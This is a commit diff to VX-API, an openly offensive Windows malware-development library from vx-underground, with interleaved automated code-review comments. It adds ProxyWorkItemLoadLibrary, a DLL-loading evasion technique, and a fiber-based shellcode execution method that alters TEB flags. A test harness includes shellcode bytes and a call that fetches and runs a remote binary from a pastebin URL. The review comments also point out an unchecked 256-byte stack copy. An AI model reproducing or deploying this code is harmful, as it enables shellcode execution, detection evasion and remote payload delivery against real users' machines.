parent
1aed815bd8
commit
d6ff84b546
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.402
|
||||
Version: 2.0.420
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -136,6 +136,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetRtlUserProcessParameters | ReactOS | Library Loading |
|
||||
| GetTeb | ReactOS | Library Loading |
|
||||
| RtlLoadPeHeaders | smelly__vx | Library Loading |
|
||||
| ProxyWorkItemLoadLibrary | Rad98, Peter Winter-Smith | Library Loading |
|
||||
| MpfComModifyShortcutTarget | Unknown | Malcode |
|
||||
| MpfComVssDeleteShadowVolumeBackups | am0nsec | Malcode |
|
||||
| OleGetClipboardData | Microsoft | Malcode |
|
||||
|
|
|
@ -26,6 +26,9 @@ typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSW)(PCWSTR, BOOL, LPCWSTR*, PIN_ADD
|
|||
typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSA)(PCSTR, BOOL, LPCSTR*, PIN_ADDR);
|
||||
typedef PWSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGW)(PIN_ADDR, PWSTR);
|
||||
typedef PSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGA)(PIN_ADDR, PSTR);
|
||||
typedef INT(NTAPI* RTLUSERFIBERSTART)(VOID);
|
||||
typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
|
||||
typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,7 +16,21 @@ HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName)
|
|||
{
|
||||
ZeroMemoryEx(wDllName, sizeof(wDllName));
|
||||
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
|
||||
if (StringCompareA(lpModuleName, wDllName) == 0)
|
||||
|
||||
CHAR InitialModuleName[256] = { 0 };
|
||||
CHAR IdentifiedModuleName[256] = { 0 };
|
||||
|
||||
if (StringCopyA(InitialModuleName, (PCHAR)lpModuleName) == NULL)
|
||||
return NULL;
|
||||
|
||||
if (StringCopyA(IdentifiedModuleName, wDllName) == NULL)
|
||||
return NULL;
|
||||
|
||||
PCHAR ComparisonObject1 = CaplockStringA(InitialModuleName);
|
||||
PCHAR ComparisonObject2 = CaplockStringA(IdentifiedModuleName);
|
||||
|
||||
|
||||
if (StringCompareA(ComparisonObject1, ComparisonObject2) == 0)
|
||||
return (HMODULE)Module->BaseAddress;
|
||||
}
|
||||
|
||||
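Review bot: `StringCopyA(InitialModuleName, (PCHAR)lpModuleName)` copies the caller-supplied name into a 256-byte stack array with no length check, so a module name of 256 or more characters overruns InitialModuleName; the W variant in the next hunk has the same unbounded `StringCopyW` into `WCHAR InitialModuleName[256]`. Reject over-long input before the copy, e.g. `if (lpModuleName == NULL || strlen(lpModuleName) >= sizeof(InitialModuleName)) return NULL;` (or the project's own length helper if the file deliberately avoids the CRT), and mirror it with the wide-string equivalent in GetModuleHandleEx2W. The `(PCHAR)` cast also discards the parameter's const qualifier; if StringCopyA does not write through its source, its prototype should take `LPCSTR` so the cast becomes unnecessary. The enclosing module-list loop and GetModuleHandleEx2A itself begin before this hunk.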
|
@ -40,7 +54,19 @@ HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName)
|
|||
Module = (PLDR_MODULE)((PBYTE)Next - 16);
|
||||
if (Module->BaseDllName.Buffer != NULL)
|
||||
{
|
||||
if (StringCompareW(lpModuleName, Module->BaseDllName.Buffer) == 0)
|
||||
WCHAR InitialModuleName[256] = { 0 };
|
||||
WCHAR IdentifiedModuleName[256] = { 0 };
|
||||
|
||||
if (StringCopyW(InitialModuleName, (PWCHAR)lpModuleName) == NULL)
|
||||
return NULL;
|
||||
|
||||
if (StringCopyW(IdentifiedModuleName, Module->BaseDllName.Buffer) == NULL)
|
||||
return NULL;
|
||||
|
||||
PWCHAR ComparisonObject1 = CaplockStringW(InitialModuleName);
|
||||
PWCHAR ComparisonObject2 = CaplockStringW(IdentifiedModuleName);
|
||||
|
||||
if (StringCompareW(ComparisonObject1, ComparisonObject2) == 0)
|
||||
return (HMODULE)Module->BaseAddress;
|
||||
}
|
||||
|
||||
|
|
|
@ -1124,3 +1124,4 @@ typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
|
|||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
||||
|
||||
typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);
|
||||
|
|
|
@ -30,20 +30,16 @@ int main(VOID)
|
|||
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
|
||||
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
|
||||
|
||||
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = GlobalOpenCalcPayload;
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_DNSQUERYEX;
|
||||
Sei.MethodEnum = E_RTLUSERFIBERSTART;
|
||||
|
||||
ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
|
||||
*/
|
||||
|
||||
MpfLolExecuteRemoteBinaryByAppInstallerW((PWCHAR)L"https://pastebin.com/raw/tdyShwLw", 34);
|
||||
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
|
||||
HMODULE hMod = ProxyWorkItemLoadLibraryA("DBGHELP.DLL");
|
||||
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
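Review bot: `HMODULE hMod = ProxyWorkItemLoadLibraryA("DBGHELP.DLL");` stores a result that is never checked or used, and the callee returns NULL on failure, so the harness cannot tell whether the call succeeded; at minimum `if (hMod == NULL) dwError = ERROR_MOD_NOT_FOUND;` before the `return dwError;` would surface it. The commented-out `SHELLCODE_EXECUTION_INFORMATION Sei` block and the trailing `//ShellcodeExecutionViaFunctionCallbackMain(&Sei);` line are dead code left in place of a deletion; version control already preserves them, so they should be removed rather than kept as comments. `int main(VOID)` begins before this hunk.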
|
|
|
@ -1,46 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
typedef int(WINAPI* RtlUserFiberStart)();
|
||||
|
||||
DWORD __revision_required_ProcessInjectFiberData(_In_ PCHAR Shellcode, _In_ DWORD Length)
|
||||
{
|
||||
NTSTATUS status;
|
||||
DWORD OldProt = 0;
|
||||
|
||||
PTEB pTeb = GetTeb();
|
||||
PVOID pTebFlags = (PVOID)((UINT_PTR)pTeb + 0x17ee);
|
||||
*(PCHAR)pTebFlags = *(PCHAR)pTebFlags | 0x4;
|
||||
|
||||
|
||||
HMODULE hModule = GetModuleHandleA("ntdll.dll");
|
||||
RtlUserFiberStart pRtlUserFiberStart = (RtlUserFiberStart)GetProcAddress(hModule, "RtlUserFiberStart");
|
||||
|
||||
LPVOID BufferAddress = VirtualAlloc(NULL,
|
||||
Length,
|
||||
MEM_COMMIT | MEM_RESERVE,
|
||||
PAGE_READWRITE);
|
||||
|
||||
RtlCopyMemory(BufferAddress, Shellcode, Length);
|
||||
|
||||
status = VirtualProtect(BufferAddress,
|
||||
Length,
|
||||
PAGE_EXECUTE_READ,
|
||||
&OldProt);
|
||||
|
||||
if (status != 0)
|
||||
{
|
||||
UINT_PTR pFiberData = (UINT_PTR)HeapAlloc(GetProcessHeap(),
|
||||
HEAP_ZERO_MEMORY,
|
||||
0x100);
|
||||
|
||||
*(LPVOID*)(pFiberData + 0x0a8) = BufferAddress;
|
||||
|
||||
__writegsqword(0x20, pFiberData);
|
||||
pRtlUserFiberStart();
|
||||
|
||||
HeapFree(GetProcessHeap(), 0, (LPVOID)pFiberData);
|
||||
}
|
||||
|
||||
VirtualFree(BufferAddress, Length, MEM_RELEASE);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,49 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
|
||||
{
|
||||
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
|
||||
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
LARGE_INTEGER Timeout = { 0 };
|
||||
|
||||
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
|
||||
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
|
||||
|
||||
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
|
||||
return NULL;
|
||||
|
||||
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryW, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
|
||||
if (!NT_SUCCESS(Status))
|
||||
return NULL;
|
||||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2W(lpModuleName);
|
||||
}
|
||||
|
||||
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
|
||||
{
|
||||
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
|
||||
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
LARGE_INTEGER Timeout = { 0 };
|
||||
|
||||
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
|
||||
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
|
||||
|
||||
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
|
||||
return NULL;
|
||||
|
||||
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryA, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
|
||||
if (!NT_SUCCESS(Status))
|
||||
return NULL;
|
||||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2A(lpModuleName);
|
||||
}
|
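Review bot: `Timeout.QuadPart = -500000;` is an unexplained magic number; a negative LARGE_INTEGER passed to NtWaitForSingleObject is a relative interval in 100-nanosecond units, so this is 50 ms, and a comment such as `Timeout.QuadPart = -500000; // relative wait, 100 ns units (50 ms)` or a named constant would spare the next reader the arithmetic. The W and A functions are otherwise identical line for line apart from the LoadLibrary routine queued and the final GetModuleHandleEx2 lookup; a shared static helper taking those two as parameters would remove the duplicated export resolution and status handling and keep the two variants from drifting. `(PVOID)lpModuleName` also casts away the parameter's const qualifier, which is worth a comment since the queued routine receives it as writable.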
|
@ -219,6 +219,30 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
}
|
||||
|
||||
case E_RTLUSERFIBERSTART:
|
||||
{
|
||||
RTLUSERFIBERSTART RtlUserFiberStart = NULL;
|
||||
DWORD64 FiberData = NULL;
|
||||
PTEB Teb = GetTeb();
|
||||
|
||||
RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
|
||||
if (RtlUserFiberStart == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Teb->SameTebFlags |= 0b100;
|
||||
|
||||
FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
|
||||
if (FiberData == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
|
||||
|
||||
__writegsqword(0x20, FiberData);
|
||||
|
||||
RtlUserFiberStart();
|
||||
|
||||
}
|
||||
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
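Review bot: `DWORD64 FiberData = NULL;` and `if (FiberData == NULL)` compare an integer with the null-pointer constant; either declare the variable as a pointer type or initialise and test against zero, e.g. `DWORD64 FiberData = 0;` / `if (FiberData == 0)`, so the intent is clear and the code does not depend on NULL expanding to an integer. The new `case E_RTLUSERFIBERSTART:` block also ends without a `break;` and falls into `default:`; if that fall-through is intended, mark it with a `/* fallthrough */` comment, otherwise add the `break;`. The enclosing switch and ShellcodeExecutionDispatchHandler begin and end outside this hunk.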
|
|
|
@ -161,6 +161,7 @@
|
|||
<ClCompile Include="GetByteArrayFromFile.cpp" />
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
|
||||
<ClCompile Include="GetCurrentLocaleFromTeb.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessIdFromTeb.cpp" />
|
||||
<ClCompile Include="GetCurrentUserSid.cpp" />
|
||||
<ClCompile Include="GetCurrentWindowTextFromUserProcessParameter.cpp" />
|
||||
|
@ -189,8 +190,10 @@
|
|||
<ClCompile Include="GetProcAddressFowlerNollVoVariant1a.cpp" />
|
||||
<ClCompile Include="GetProcAddressJenkinsOneAtATime32Bit.cpp" />
|
||||
<ClCompile Include="GetProcAddressLoseLose.cpp" />
|
||||
<ClCompile Include="GetProcAddressMurmur.cpp" />
|
||||
<ClCompile Include="GetProcAddressRotr32.cpp" />
|
||||
<ClCompile Include="GetProcAddressSdbm.cpp" />
|
||||
<ClCompile Include="GetProcAddressSipHash.cpp" />
|
||||
<ClCompile Include="GetProcAddressSuperFastHash.cpp" />
|
||||
<ClCompile Include="GetProcAddressUnknownGenericHash1.cpp" />
|
||||
<ClCompile Include="GetProcessBinaryNameFromHwnd.cpp" />
|
||||
|
@ -205,8 +208,10 @@
|
|||
<ClCompile Include="HashStringFowlerNollVoVariant1a.cpp" />
|
||||
<ClCompile Include="HashStringJenkinsOneAtATime32Bit.cpp" />
|
||||
<ClCompile Include="HashStringLoseLose.cpp" />
|
||||
<ClCompile Include="HashStringMurmur.cpp" />
|
||||
<ClCompile Include="HashStringRotr32.cpp" />
|
||||
<ClCompile Include="HashStringSdbm.cpp" />
|
||||
<ClCompile Include="HashStringSipHash.cpp" />
|
||||
<ClCompile Include="HashStringSuperFastHash.cpp" />
|
||||
<ClCompile Include="HashStringUnknownGenericHash1.cpp" />
|
||||
<ClCompile Include="IsDebuggerPresentEx.cpp" />
|
||||
|
@ -228,6 +233,7 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
|
|
|
@ -459,6 +459,24 @@
|
|||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashStringMurmur.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashStringSipHash.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetProcAddressSipHash.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetProcAddressMurmur.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -88,7 +88,8 @@ typedef enum SHELLCODE_EXECUTION_METHOD {
|
|||
E_ENUMERATELOADEDMODULES, //30
|
||||
E_ENUMPAGEFILESW, //31
|
||||
E_ENUMPWRSCHEMES, //32
|
||||
E_DNSQUERYEX //33
|
||||
E_DNSQUERYEX, //33
|
||||
E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
|
||||
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
|
||||
|
||||
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
|
||||
|
@ -165,6 +166,8 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
|
|||
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
|
||||
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
|
||||
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
|
||||
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName);
|
||||
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName);
|
||||
|
||||
|
||||
|
||||
|
|